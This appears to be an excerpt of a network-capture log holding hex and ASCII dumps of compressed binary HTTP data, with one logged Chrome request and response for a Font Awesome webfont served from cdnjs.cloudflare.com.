                                                      2024-10-23 21:29:39 UTC1369INData Raw: fb 41 37 0f ec 60 ef 74 2f 49 3b b0 33 2d 4b 96 76 64 4b b1 ec 18 d6 44 d1 84 6d 85 64 73 d0 e3 f8 12 db 41 85 d0 1b 62 85 d0 e3 23 d4 3f 1f c1 da 47 e4 4f ce 6d 2e 99 3d 9e ac 9c ff ea 75 78 fd 3a bc d7 9d 67 72 cf f4 cc f4 cc a6 09 bd 33 bd e1 f6 76 2e af 74 0a 7b a7 70 a7 78 a3 90 40 48 0b 02 24 04 42 23 a2 48 d6 01 06 04 18 34 72 42 02 3e 9c 13 c6 09 8d b0 fd 1d d2 19 27 1c b5 38 e2 84 0f 07 c0 81 be 9f 70 6a fd 3c d1 68 34 1a a1 67 e4 d8 71 2c 59 b6 e4 c4 4e 62 5b b6 95 b0 bb c0 6d 73 c4 5e 4c f7 30 dd ed 02 5d 7d c7 dd a3 dc c7 7e f6 27 ce 11 fb 13 77 3f 61 3e 10 39 3f cf cf d4 fe 9d 0b f4 de bb 0f 48 c0 4f d2 93 66 46 23 69 34 92 c6 9e 19 8f 4c b1 1d 3b 89 9d 34 71 a8 c9 04 37 61 a7 6d c2 6d a6 94 c2 52 da 85 94 33 05 5c f2 76 81 9b c9 62 cb ee c7
                                                      Data Ascii: A7`t/I;3-KvdKDmdsAb#?GOm.=ux:gr3v.t{px@H$B#H4rB>'8pj<h4gq,YNb[ms^L0]}~'w?a>9?HOfF#i4L;4q7ammR3\vb
                                                      2024-10-23 21:29:39 UTC1369INData Raw: c9 d5 dc 28 56 bd 3c 5b 33 aa d5 ba 94 f6 2e ee 34 2a b9 77 b9 b3 5a 57 25 53 ec 90 d4 76 29 0c 73 a9 ca b3 f3 ce 2a f9 34 68 fc b5 0c c4 93 18 1b 5a ea 47 27 ab ee 6c 63 c7 de 95 cd d9 89 a9 b2 9c 94 b3 81 9c 37 02 76 4f 35 e6 30 1a 3f 8e 51 e4 82 f7 af cb 01 83 c5 bd f7 2b d5 de 34 ec 6e db 43 05 a3 d1 dd f9 d0 e1 f0 3c d1 6f 44 91 bb ce 26 2d 6d 95 c7 cb 14 89 03 c1 d3 81 8c 7a a0 87 c5 b8 72 f3 7b d4 c8 5c c8 b8 21 ef 3b 87 d5 ea a2 75 94 58 8a f8 e7 29 de 8b f6 d2 79 90 a8 66 dd 3a 30 18 d6 a0 2b 9d 21 cf e1 eb 90 7f ba b8 7d 1c 45 f1 36 22 b7 e9 90 d5 2e 9d 8f 32 bf c3 fa ca 67 ab 18 d4 cb 91 bd ed fa b4 f4 07 cc 93 b5 22 a7 2d ae 05 87 f4 1d df c6 63 19 97 f8 48 c7 a8 bf d3 90 65 e2 c9 9c 8d 6f cd 06 0f f7 90 38 b0 73 ef 5f 14 cc 5b cc 97 1a 96 04
                                                      Data Ascii: (V<[3.4*wZW%Sv)s*4hZG'lc7vO50?Q+4nC<oD&-mzr{\!;uX)yf:0+!}E6".2g"-cHeo8s_[
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 26 63 31 21 13 31 31 93 33 05 d3 30 2d d3 31 3d 33 33 17 f3 b3 30 4b b3 0c 2b b3 26 6b b1 1e 1b b3 15 fb 72 04 c7 72 32 a7 72 06 67 71 36 e7 70 1e 17 71 33 b7 72 1b 77 f0 00 cf f1 32 ef f2 1e ef f3 01 1f f3 35 3f f2 1b bf f3 27 7f f1 9f 02 15 46 11 94 58 99 94 5b f9 54 4e e5 55 59 55 d5 48 1d d5 47 7d d5 5f 03 34 42 13 34 51 93 34 59 d3 34 5d b3 34 5f 0b b5 58 2b b5 56 bb b5 47 fb b4 5f 07 74 50 87 74 58 47 75 5c 27 74 59 37 74 53 0f f5 4a 6f f4 5e 9f 24 7d d3 4f fd b3 50 16 d1 12 5a 62 4b 6b d9 2d af 35 b0 46 d6 d4 5a d8 30 1b 6e 63 6c aa ad b2 23 76 cc 4e d9 39 bb 62 d7 ec 91 3d b5 57 f6 c9 7e db 5f fb ef a1 3d aa 27 f7 94 9e d3 73 7b 7e 2f e8 45 bc 98 97 f0 52 5e c6 2b 78 65 af ea 35 bc ae 37 f2 26 de dc 5b 7b 27 ef ee 3d bd 9f 0f f2 21 3e dc c7 f8 04
                                                      Data Ascii: &c1!1130-1=330K+&krr2rgq6pq3rw25?'FX[TNUYUHG}_4B4Q4Y4]4_X+VG_tPtXGu\'tY7tSJo^$}OPZbKk-5FZ0ncl#vN9b=W~_='s{~/ER^+xe57&[{'=!>
                                                      2024-10-23 21:29:39 UTC1369INData Raw: d8 8d dc c0 f5 c1 f5 5c 17 5c c7 b5 5d cb 65 2c c7 1c fc 96 f3 39 2f 38 8f 73 3b a7 fe d1 5f d0 1f fd d0 17 7d d4 0b d0 73 d0 33 3d d5 23 3d 04 3d 00 dd d7 3d dd d1 2d 5d d1 25 9d d5 19 1d 03 1d 06 1d d4 01 ed 01 ed 06 d0 66 d0 26 d0 06 00 ad 00 2d d3 52 2d d6 0c d0 34 d0 54 d0 94 be ff b5 ef 44 d0 58 8d 01 0d d5 10 0d d6 40 f5 57 1f f5 52 0f 75 51 47 b5 53 7d d5 53 55 50 89 f8 37 fe 89 3f f1 1b 20 1e c6 cd 38 15 fb 63 5f ec 8e 1d b1 35 b6 c4 c6 58 1f ab 63 49 cc 80 98 1a e3 63 58 f4 89 de d1 2e da 46 eb 68 15 2d a2 79 34 8b a6 d1 24 1a 46 fd a8 17 75 a2 46 54 8d 2a 51 39 2a 44 f9 c8 a2 6c 94 86 28 1e c5 a2 68 44 a4 28 12 85 23 2f a4 ff d3 9f f4 23 7d 4b 5f d3 97 f4 39 bd 4d 2f d3 f3 f4 34 3d 86 74 35 9d 87 74 0e d2 59 48 67 20 9d 4e a7 d2 c9 74 22 1d 4b
                                                      Data Ascii: \\]e,9/8s;_}s3=#===-]%f&-R-4TDX@WRuQGS}SUP7? 8c_5XcIcX.Fh-y4$FuFT*Q9*Dl(hD(#/#}K_9M/4=t5tYHg Nt"K
                                                      2024-10-23 21:29:39 UTC1369INData Raw: f3 01 c0 7e 05 32 40 06 10 20 01 72 80 02 75 80 ba 40 00 1a 01 ad 81 02 40 3b 60 0c 50 0a 98 0c 4c 06 ca 03 53 80 29 40 05 60 2a 30 15 a8 08 4c 03 a6 01 95 80 e9 c0 74 a0 32 30 03 98 01 54 01 66 f2 b7 a8 0a cc 2a aa 01 b3 8b ea c0 9c a2 06 30 b7 88 81 79 45 06 98 5f 64 81 05 45 02 2c 2c f2 80 45 45 0e 58 5c a4 c0 92 a2 26 b0 b4 a8 05 2c 2b 6a 03 cb 8b 3a c0 8a a2 2e b0 b2 a8 07 ac 2a ea 03 ab 8b 06 c0 9a 83 1a 02 17 43 37 02 97 42 37 03 57 42 9f 00 ae 86 76 02 ae 83 15 04 6e 83 de 05 dc 0d ed 0c bc 0e d9 07 fc 0e fb 08 e2 32 90 d7 21 ae 0a ed 0b 71 35 68 3f 88 5b 43 bb 41 dc 06 da 1d e2 4b a0 67 20 be 02 ba 09 e2 2b a1 5b 21 be 0a fa 0a c4 d7 40 37 40 7c 0b fc 3d 88 ef 40 68 04 f1 bd d0 2d 90 c9 c2 0a 40 e6 20 e4 05 c8 1c 82 bc 04 99 c3 90 17 21 73 04 f2
                                                      Data Ascii: ~2@ ru@@;`PLS)@`*0Lt20Tf*0yE_dE,,EEX\&,+j:.*C7B7WBvn2!q5h?[CAKg +[!@7@|=@h-@ !s
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 68 0f 93 2b 0a 71 28 b9 52 66 1c 44 ae 4c ae 45 7b 9c 5c 87 dc bc ad d9 e4 16 a0 3d 47 6e 89 f6 3c b9 55 4f 7b 99 dc 86 dc a9 bd de e4 ce c0 20 72 17 b4 b7 c9 5d 27 34 90 dc 8d dc 8b f6 0e b9 0f 79 14 ed 43 f2 18 65 b4 ef c9 e3 c9 93 68 3f 90 27 0b 71 06 79 0a e2 4c f2 54 b4 22 4f 33 b6 09 a7 f3 33 b6 9f c9 33 c9 b3 68 bf 90 e7 90 e7 d2 7e 23 cf 27 2f a4 fd 41 5e 24 c4 c4 e4 c5 68 37 91 97 4c d8 fe 26 af 20 af a2 fd 43 5e 43 5e 4b fb 9f bc 4e 3d b1 30 79 3d 79 d7 f5 7d db 21 ef 21 ef 23 46 90 cf 90 2f 11 a3 c9 57 c8 57 89 a9 c8 b7 c8 8f 88 69 c8 4f 30 7e 76 db 67 e4 e7 fb 2a 4d 7e d1 61 c0 79 64 8f f6 19 f9 65 4f 4b f2 2b f2 c7 36 d6 56 32 c9 5f 89 05 c8 df 40 b7 08 f9 3b e2 44 f2 8f cc b8 8e fc 93 fc 9f 58 94 42 0d de cf 6c 6a 08 19 dd 26 d4 50 6a 38 b1
                                                      Data Ascii: h+q(RfDLE{\=Gn<UO{ r]'4yCeh?'qyLT"O333h~#'/A^$h7L& C^C^KN=0y=y}!!#F/WWiO0~vg*M~aydeOK+6V2_@;DXBlj&Pj8
                                                      2024-10-23 21:29:39 UTC1369INData Raw: ed 15 b2 37 ed 35 da eb e4 00 da 9b b4 b7 c9 41 b4 0f 48 e4 50 da c7 22 87 d1 3e f5 c8 e1 b4 cf 69 5f 90 23 68 5f 49 e4 28 da b7 22 47 d3 7e 10 39 86 f6 8b c8 b1 b4 df 3d 72 1c ed 3f b4 ff 92 e3 a9 61 24 72 22 15 91 93 a8 31 45 4e a6 c6 11 39 85 9a 48 e4 54 6a 0a 91 d3 a8 a9 36 62 4e a7 a6 a5 a6 23 67 50 33 51 33 93 b3 a8 d9 a9 39 c9 39 d4 02 f2 c8 f9 d4 22 d4 a2 e4 02 6a 29 89 5c 44 2d 2b 72 31 b5 82 c8 25 d4 ca 22 97 52 6b 88 5c 46 ad e5 91 cb a9 75 a8 f5 c8 15 d4 86 f2 c8 d5 d4 66 d4 e6 e4 1a 6a 6b e5 cc 75 d4 b6 d4 f6 e4 7a 6a 27 6a 17 72 13 b5 9b 44 6e a5 f6 10 b9 8d da 57 e4 76 6a ff 9c b9 83 3a 90 3a 88 dc 49 1d 42 1d 4a ee a6 8e 50 ce dc 4b 1d 45 1d 4b ee a3 4e a0 4e 22 0f 51 e7 2b 67 1e a5 2e a4 2e 21 8f 51 57 52 57 91 a7 a8 1b 24 f2 0c 75 93 c8
                                                      Data Ascii: 75AHP">i_#h_I("G~9=r?a$r"1EN9HTj6bN#gP3Q399"j)\D-+r1%"Rk\Fufjkuzj'jrDnWvj::IBJPKEKNN"Q+g..!QWRW$u
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 90 f0 38 ca bf 92 b8 09 ca 85 e8 54 94 7f 27 fa 11 e5 bf 2b 54 5b 1d fa 6f 25 07 f4 29 72 41 e2 72 e4 46 e2 58 e4 b5 88 2e 46 5e 87 e8 12 e4 75 49 f8 05 79 3d 12 1e 43 5e 9f e8 08 e4 8d 89 7e 42 de 84 e8 7c e4 4d 89 fe 46 de 8c 84 91 c8 9b 93 f0 14 f2 16 44 57 21 6f 49 42 23 e4 ad 48 38 17 79 77 a2 f7 91 f7 24 a1 0e f2 5e c4 de 46 de 8f d8 71 c8 87 91 b0 00 f9 70 0b 6e 26 c4 2e 41 3e 9b d8 ad c8 e7 90 78 2d f2 b9 c4 ae 47 3e 8f d8 2d c8 e7 13 7b 04 f9 02 62 ef 20 5f 4a 74 06 f2 ed d5 7e 89 ef 84 fa 47 e2 bb 42 ec 2b e4 7b 92 f0 2e f2 bd 89 7d 83 7c 7f f5 95 c4 0f 84 54 2b 91 1f 46 42 6f e4 c7 a8 bf 26 7e 1c 24 4e 45 7e 3c b1 75 c8 4f 20 e1 39 e4 67 92 6a 32 f2 b3 48 34 e4 57 68 99 4f fc 4a 48 5c 85 fc 1a a2 ab 91 5f 4b c2 93 c8 af d3 32 99 f8 ad 90 6a 4b
                                                      Data Ascii: 8T'+T[o%)rArFX.F^uIy=C^~B|MFDW!oIB#H8yw$^Fqpn&.A>x-G>-{b _Jt~GB+{.}|T+FBo&~$NE~<uO 9gj2H4WhOJH\_K2jK
                                                      2024-10-23 21:29:39 UTC1369INData Raw: f4 fc 72 58 32 f9 3e 8d 61 b9 12 71 43 37 4c 87 73 2f 8e dc 5e b5 3c cc 4e f3 83 72 18 33 26 71 c6 98 5c 24 9a 46 74 c7 11 82 9a 1a 21 84 50 6e fb ca 30 2d c9 d1 60 16 97 95 6a a3 16 84 b6 a5 b5 56 fb 17 4a 11 35 4a 99 c9 b9 e0 86 6e 50 d3 d4 4c 6e fb ae 61 52 f5 93 d5 ac 05 01 b3 48 2a 19 bb 1e a3 0e 00 a7 38 f5 e3 d9 15 00 98 a5 bd 36 45 d3 71 f3 e0 68 b8 91 1b a3 a2 37 2a b2 3c cb 4d 6a d2 38 89 13 c3 a4 bd 58 69 54 e4 7e 2e bc cf 16 c2 9e cf 18 b3 85 b0 71 cc d8 fc b7 aa be 8f e8 fb d5 cf bb 46 48 dd 0b f7 31 36 9f d9 42 d8 8c e1 d8 16 c2 be af 97 67 ad fa 3e 4e df f7 08 20 94 f7 76 f0 33 b8 0d e7 03 74 cc b4 bd 8e 76 35 fb 56 8b d1 26 9a 6f 46 12 37 f0 d6 d5 4f e2 1a 5a 7a 06 35 15 3a 45 7e fc 84 ed 5b d6 3d 8c 09 61 db f7 5a 96 6f 9b 9a c6 ef b9 87
                                                      Data Ascii: rX2>aqC7Ls/^<Nr3&q\$Ft!Pn0-`jVJ5JnPLnaRH*86Eqh7*<Mj8XiT~.qFH16Bg>N v3tv5V&oF7OZz5:E~[=aZo


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.1649655104.17.25.144436768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-23 21:29:39 UTC654OUTGET /ajax/libs/font-awesome/6.1.1/webfonts/fa-brands-400.woff2 HTTP/1.1
                                                      Host: cdnjs.cloudflare.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://new.alex-gps.com
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: font
                                                      Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-10-23 21:29:39 UTC980INHTTP/1.1 200 OK
                                                      Date: Wed, 23 Oct 2024 21:29:39 GMT
                                                      Content-Type: application/octet-stream; charset=utf-8
                                                      Content-Length: 105536
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: public, max-age=30672000
                                                      ETag: "623a082a-19c40"
                                                      Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT
                                                      cf-cdnjs-via: cfworker/kv
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Timing-Allow-Origin: *
                                                      X-Content-Type-Options: nosniff
                                                      CF-Cache-Status: HIT
                                                      Age: 15031
                                                      Expires: Mon, 13 Oct 2025 21:29:39 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lC19xCTM3EmAOK3zvJI113V1ktFb3RjdCWmkoW2w3LvOL2xBsZwmEnyfbV0evpl3gd3PknVCG6VYphlJYjxBbwHbPiNf%2FpO9t5s%2Foc0iAGn9GskDu5JmM59ETiy%2BHSL%2F7jrPR%2BzB"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=15780000
                                                      Server: cloudflare
                                                      CF-RAY: 8d74d2e3ac872e77-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-10-23 21:29:39 UTC389INData Raw: 77 4f 46 32 00 01 00 00 00 01 9c 40 00 0a 00 00 00 02 af a4 00 01 9b f6 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 8f 50 00 8d 48 ca 8a a8 1c cb 8f 54 05 88 20 07 20 a5 d1 57 51 67 00 82 f3 00 00 b0 56 3f 0f aa 48 d7 49 ed 1e 00 55 d5 3a 31 b8 a9 1a 10 7e fa e5 b7 3f fe fa e7 bf bf 0a 8c dd 0d b1 8e eb f9 86 ff fa fd ca 73 fb ff 99 79 0b c4 2a 8a f0 85 59 ae 4b 45 46 c8 0e 94 1f b5 b1 ec 53 51 ab 52 5d d1 a4 48 11 48 40 95 6f 61 8e b6 88 fa e3 a3 7e 3f c4 dd 7b 26 40 67 36 69 8a fb 61 db db d0 55 12 e6 a5 e6 b0 7a 35 f5 a3 b8 78 c2 af a8 ff 3c aa ea df f3 00 bc 87 87 49 90 00 1e 87 c4 05 12 90 2c c9 22 09 12 b0 a5 d8 92 57 1a 37 76 e2 24 76 b3 7f 9c 74 8c e9 46 5d e9 da e9 58 ea 58 5b e9 1f 6b a9 fd
                                                      Data Ascii: wOF2@8$ `PHT WQgV?HIU:1~?sy*YKEFSQR]HH@oa~?{&@g6iaUz5x<I,"W7v$vtF]XX[k
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 53 f1 74 04 f1 bf 2d a5 62 f6 81 14 3e e2 d9 4e 45 24 63 ad 07 4f a9 09 41 54 e1 9f aa eb fb 93 77 20 e5 48 8d 41 f7 1b 79 4b 36 aa f1 50 59 51 95 03 e3 63 ef 25 c4 a5 b8 b4 fc ff f7 7d d3 ca 69 a4 36 ce d5 58 1b b7 b1 d1 18 17 3a 1f 44 7b 9f fb 82 7b df fb c1 7d 1f 08 ee ff 40 f0 3e 50 c1 03 aa 82 f7 81 0a 1e 50 7c 1f 80 d8 1f a8 92 1a 55 64 f7 42 51 ec 5e 25 b3 66 15 25 4d af 62 89 dd 8b 52 b7 7f 1f 68 f3 81 6a f3 50 55 6b cd 03 a9 e0 81 6c f3 8b 1a 03 92 63 8a ea a9 22 c7 d0 05 a2 a4 35 4b 6e b4 c8 a6 da 19 4a 63 b4 26 9a c9 26 9c 09 e3 22 95 14 39 1d 8c f1 d9 04 51 60 8c f3 c7 d0 de e4 fe 1a 6d 12 45 c0 c7 f2 3a 4d c6 0c ff bb a6 15 5c 88 90 79 49 4d 64 5a 5d be d5 5d aa 49 08 d8 2a a3 91 a2 23 74 f4 73 68 6b 97 75 dc e0 20 04 4c 64 99 5d 7b df c7 26
                                                      Data Ascii: St-b>NE$cOATw HAyK6PYQc%}i6X:D{{}@>PP|UdBQ^%f%MbRhjPUklc"5KnJc&&"9Q`mE:M\yIMdZ]]I*#tshku Ld]{&
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 46 ca 4a 3d e9 2e b6 f9 2d b5 f6 c6 7a 73 3f b9 6c ec 30 7f fa 87 ae f7 5f 5c 5e a3 48 5f 0c c0 40 0c c3 08 8c c4 78 4c c3 2c cc df fe 24 dc 80 2d d8 86 53 b8 84 07 78 86 78 7c 83 cf d4 cc c8 6c cc c9 b2 2c c7 2a ac ce 86 ec c2 6e ec c9 c1 1c c6 49 9c c6 59 5c c1 95 78 d0 4b f4 4a bd 59 6f d7 bb f4 6e bd 4f 1f d3 97 f4 63 fd 5a bf 33 1d 4d 37 33 cc 8c 35 13 cd 34 33 d3 cc 37 cb cd 6a b3 de 6c 31 87 cc 39 73 d1 5c 31 db 6a 37 cc 3d f3 c0 bc 35 ef cd 97 ed fe 06 4c 96 1f e4 e7 f1 43 fc 18 bf 80 5f 68 fb 7d ff c9 ff e2 7f 0d 88 cb af ef 2a 9a dc 29 79 c4 2f 3d 2f 79 69 f2 de e4 83 c9 27 7f 77 de 26 7f 4c 29 99 52 e5 cb 77 f6 9b ec 07 d9 37 e9 a7 bf b3 e1 b9 5e b8 07 4f ba ef dd e7 ee 53 f7 98 7b 24 a1 6f 02 c5 bf 8f ef 1e 5f 32 5e c4 a5 c7 ed 8e db 1a 17 1d
                                                      Data Ascii: FJ=.-zs?l0_\^H_@xL,$-Sxx|l,*nIY\xKJYonOcZ3M735437jl19s\1j7=5LC_h}*)y/=/yi'w&L)Rw7^OS{$o_2^
                                                      2024-10-23 21:29:39 UTC1369INData Raw: c1 c5 47 b6 25 60 59 b6 67 f5 9a a3 85 96 6d c7 dd 0b 1e 5a 39 61 c6 dc 69 b5 5a cb e8 9c b3 5d 47 9a 76 d6 2e 93 a4 d9 ec 44 60 7c 72 75 4d 3f a0 be bc 79 ec d2 d2 42 0b be 37 a5 4e 04 8d 03 18 d4 5c 6c 33 79 2f 56 b1 c0 55 fb 56 d5 34 1d 4d e3 bf f4 6b 60 9c 02 a8 6a 99 26 9e 34 df a9 e8 c2 75 1c 5c 70 96 86 5f a9 dc 4b 11 de b3 da 34 a6 d3 44 43 43 44 5c 70 31 b7 5a e4 d8 ad 69 96 ae 3b 71 3b 17 5c 24 69 86 41 ad 76 e5 f5 7f 87 c1 49 80 e1 a0 e8 16 83 21 90 d4 3d 0f c3 41 b1 5d 0c 86 f0 bc fa f3 ba ad 6a 15 a8 56 5b ef 43 a3 ed 66 6f 77 bf 3a 98 71 d8 7f 38 28 66 83 6a ab d9 6d d9 bf db 6c 55 df 86 6a b5 45 7d 82 ad 6a 15 f3 bd d6 0e 9b 8e b4 69 94 33 c7 62 15 ab aa d0 98 94 c5 cf 48 9f 4b 07 46 0d 76 0d 98 35 ee fb 8e 5b 73 db 34 d8 bd cd 67 db a1 03
                                                      Data Ascii: G%`YgmZ9aiZ]Gv.D`|ruM?yB7N\l3y/VUV4Mk`j&4u\p_K4DCCD\p1Zi;q;\$iAvI!=A]jV[Cfow:q8(fjmlUjE}ji3bHKFv5[s4g
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 75 9c 67 fe 09 62 d5 ef c7 31 de 43 04 ea 1c ec e3 32 76 e9 f8 7d 0c dc 19 ed d8 fd f2 0e 63 47 bb 16 b4 81 a8 22 76 34 de 43 fe f2 83 52 e0 17 ac f5 f4 f0 fa ca a1 86 63 18 3a 77 6c 77 73 32 69 45 3a 57 f5 ad 41 3a 54 ca 94 87 ce bc c2 e5 42 d7 6c c7 3d 35 1c 7a b5 ed df 3d 67 8e 34 43 c0 b1 6d 6e 3b ae 63 18 86 e2 86 6f 37 db 41 10 58 15 bf d3 9e 8e 17 56 07 ba 6d 7b 2e e7 5a a0 69 b6 13 77 2a af a3 2b ed f6 94 7f d4 da fc 36 33 23 17 27 74 1c 6a 9a 62 d6 ec 1f a8 d5 e0 b2 c1 9c bf 9a cb 84 75 91 a4 9b fe 0e ad 39 c8 88 5e 3f 7b f6 cb ec b0 a2 bc e1 86 b2 68 0e 07 85 78 87 eb f5 f8 de 85 a2 60 ac 28 2e 7c ef 11 cd fe de 6c 30 00 06 83 59 5d c7 75 a9 bf 8c 8b 34 d3 9e 43 d8 c2 7a 18 0b 21 f7 43 e5 ae 9e ff c2 17 19 8e e3 b8 86 ae e3 69 73 f9 f6 d9 58 75
                                                      Data Ascii: ugb1C2v}cG"v4CRc:wlws2iE:WA:TBl=5z=g4Cmn;co7AXVm{.Ziw*+63#'tjbu9^?{hx`(.|l0Y]u4Cz!CisXu
                                                      2024-10-23 21:29:39 UTC1369INData Raw: bf 9e 79 07 91 bd 2c 77 0f bb 54 a5 98 0e 13 0d 0d 84 7e 24 f0 e4 cf a6 59 9a 0d 83 5e a0 25 b3 44 d7 53 c6 0b 0c f0 bb ea ac c4 8a ed 86 9e eb ba 61 e4 7a 9c db f3 3f c6 de d9 19 2a 4b ad 38 72 6c db 89 e2 66 c5 73 9d 23 5f e4 ae 1b c6 ae e7 79 91 63 db fc df e6 db d8 9b bf b2 de f2 dc 58 2d 2c c4 ca 75 0d c3 b9 ce 21 4e 74 b0 ff fc ce fb 1a ba 85 1e 41 cf a5 0f 10 95 b3 b5 35 cd d2 44 ba 9c 26 fa 49 3f 49 9f e4 84 0a a3 30 d2 9c 53 b1 8a cb 49 3e c9 a5 24 50 ba 3d d3 d9 74 56 98 39 45 a5 39 86 0b 2e ca ba 86 e2 62 a0 cc e5 08 da 31 5a 28 78 c2 93 7e d2 cf fa 59 3a 4b 67 d3 d9 b4 9c 96 45 5e e4 93 7c a2 26 2a 8e e2 28 8c 42 b1 df f5 7c 3f 58 5c 0c 84 ef ab 2b 32 f6 ea 8d 90 1b 06 8f ea 75 2f 96 06 29 bd 56 30 b6 bd 8a 57 c6 71 1c b7 56 57 5b 36 94 4a 2e
                                                      Data Ascii: y,wT~$Y^%DSaz?*K8rlfs#_ycX-,u!NtA5D&I?I0SI>$P=tV9E9.b1Z(x~Y:KgE^|&*(B|?X\+2u/)V0WqVW[6J.
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 45 ae e2 2d 4c f3 a2 54 71 99 15 a5 9a cc b2 a2 54 93 b2 58 47 51 4e f3 b2 58 47 31 bb b7 78 0b 45 26 9a cd e6 a7 d3 2c 9f 1c c3 54 24 ee 4c 6f e9 72 ee 1b d2 65 c0 ec 1d c7 2a e1 55 eb 6f 22 56 59 59 ac 23 8f 92 b4 cc 8a 92 18 82 a3 1a 75 ae 98 0b 9e 28 85 72 45 36 ca 6c 66 a9 74 05 45 a9 e2 2d 2d 7e 3d c1 3b 88 45 d2 5f 44 28 b8 c8 dc 73 ea 54 a6 cf ca ff 2a 62 3c 51 b1 e0 09 fe 3f 46 cd 30 eb f0 75 d9 00 60 69 b2 c9 18 97 0d c6 c0 a4 d2 98 a1 99 91 a6 49 dd 0c 34 cd e3 dc d3 b4 c0 d4 25 c0 58 64 6a 06 d3 94 64 60 ac 21 39 63 0d 83 31 66 01 68 48 dd 47 dd 34 6a 88 39 8f af 71 2c 63 cc 68 7c 7d 2f a6 bd 58 8c 01 5f 8f 02 63 ea f3 e7 dd d4 9f 02 23 21 ee 77 75 73 b8 bc 94 9a 9a db 35 cd b7 69 da 1a 46 ba 65 71 30 4d 63 a6 b0 ae 37 a5 10 42 0a a1 eb 1e be
                                                      Data Ascii: E-LTqTXGQNXG1xE&,T$Lore*Uo"VYY#u(rE6lftE--~=;E_D(sT*b<Q?F0u`iI4%Xdjd`!9c1fhHG4j9q,ch|}/X_c#!wus5iFeq0Mc7B
                                                      2024-10-23 21:29:39 UTC1369INData Raw: 0b dc ba dd e2 c8 b5 30 de d8 68 78 ae e7 d5 df 59 58 fb 2f e6 df eb 2b 05 28 d5 47 fb f3 69 6c 55 ab ad f9 f7 5a d5 6a b5 da 42 bb 55 ad 5e 39 f6 75 f3 fd f7 b8 9e 8a 3c f7 9d f7 b8 5e 1c 7b ee dd 50 aa 7f 9a e5 f3 d7 ff 1d ab 56 5b 95 03 2a 20 b2 c8 39 d8 c7 17 b0 4b 7d 3a 41 d7 d3 9d f4 58 7a 36 bd 94 de 4c ef a7 cf 12 95 83 bb 35 9b ae 63 2d 9d fa e0 8b 08 3b 30 32 e6 1d 83 8a 73 d5 f7 31 4b 9d 34 3a f2 78 99 68 17 bb 05 bc e3 84 56 94 e3 02 a1 75 44 14 2b bb c7 91 69 a6 b6 7f ea ec 53 8b 39 6a 0e 29 fb 7b 2f 8e 8e dd 29 9f d0 98 e6 80 3d fd 5a c3 88 0d e3 61 86 11 6b 4c d7 b4 a7 01 6f 61 da 83 61 f8 1e c7 83 99 26 61 3c 9c 31 8d 3d 5c 07 93 43 8f 73 6e 3a 8e a9 b1 68 db e3 42 08 b7 6c b6 b6 85 ae 78 7b ef ee ed 63 ba 8f ef b7 eb 9b 1e e7 3c 5b fc c9
                                                      Data Ascii: 0hxYX/+(GilUZjBU^9u<^{PV[* 9K}:AXz6L5c-;02s1K4:xhVuD+iS9j){/)=ZakLoaa&a<1=\Csn:hBlx{c<[
                                                      2024-10-23 21:29:39 UTC1369INData Raw: c6 fc 7d d0 00 1d bf 80 f9 ef c1 58 7e 1d 6f d9 00 a6 d0 3f 87 fa 9b bf 8c 01 9a 21 ab 17 f8 6f 46 d8 a3 15 da a6 8b f4 28 22 c4 62 82 0d f5 d2 90 86 20 b7 b1 35 3b c8 67 97 e6 b0 fa b5 c7 22 cd d2 a4 d7 17 7c 11 a1 53 c2 cd 8c 78 86 d2 f7 8d 63 8f 50 e3 bc fe 8a a2 18 fe a5 c1 d0 6c 2c cd bf b2 d4 68 02 cd c6 d2 62 43 82 14 5b 67 6f b9 56 ba d8 ab 33 1b 8b 4b 8d 0c 96 f4 e6 7b 9e 25 a5 e5 61 db b3 24 e6 3f 96 80 94 be 27 2d 4b 7a 9e f5 ed aa f5 3c 5f 5a 90 96 e7 49 dc d2 ca 7e e3 d4 15 34 57 7e 25 6b 35 d0 34 3d d7 94 f2 cc 19 29 4d d7 33 9b 68 5c ed 4b 29 a5 ff 1d 2f 36 a1 dd f2 be b3 22 bd de 49 e7 5b 45 5c ce 49 e9 06 b6 83 6d ba 48 77 d3 13 e8 b9 f4 46 bc 24 20 36 50 85 19 0c 03 b1 7a c6 51 14 e5 68 96 f4 a5 ed e1 32 17 ba d7 14 5c f0 64 34 e6 c9 68
                                                      Data Ascii: }X~o?!oF("b 5;g"|SxcPl,hbC[goV3K{%a$?'-Kz<_ZI~4W~%k54=)M3h\K)/6"I[E\ImHwF$ 6PzQh2\d4h
